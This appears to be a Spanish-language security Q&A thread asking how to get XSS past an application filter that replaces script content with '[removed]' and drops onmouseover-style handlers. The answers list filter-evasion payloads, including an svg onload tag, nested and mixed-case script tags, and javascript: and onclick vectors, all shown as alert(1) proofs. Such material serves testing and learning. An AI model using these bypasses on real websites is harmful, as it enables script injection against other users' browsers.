xss bypass para elementos de javascript filtrados como [eliminado]

Question

#1 de Metoniem (1 votos)
#2 de hmrojas.p (0 votos)

0

Si escribimos la prueba ">script>alert(1)/script> , la aplicación está filtrando el JavaScript con test">[removed]alert(1)[removed] .

Y las cargas útiles como onmouseover , onmouseout se omiten.

En este caso, qué tipo de omisión de JavaScript se puede utilizar para realizar XSS.

xss javascript

pregunta Niharika Sharma 15.02.2016 - 12:57

fuente

2 respuestas

1

Un poco tarde, pero hoy me encontré con un sitio web que filtra de la misma manera. Me las arreglé para evitarlo de esta manera:

<svg/onload=alert(1);

respondido por el Metoniem 30.07.2017 - 09:40

fuente

Lea otras preguntas en las etiquetas xss javascript

¿Cómo se instala el controlador con un certificado caducado? creando un entorno de prueba

score 0 · Accepted Answer

Creo que puedes probar con las siguientes opciones:

<scr<script>ipt>alert(1)</scr</script>ipt>
<ScRiPt>alert(1)</ScRiPt>

También puedes usar otras etiquetas HTML:

<img src="javascript:alert(1)">
<h1 onclick="alert(1)">Click me</h1>

Le recomiendo el siguiente enlace, puede encontrar ejemplos útiles.

Espero que esta información te ayude.

Buena suerte.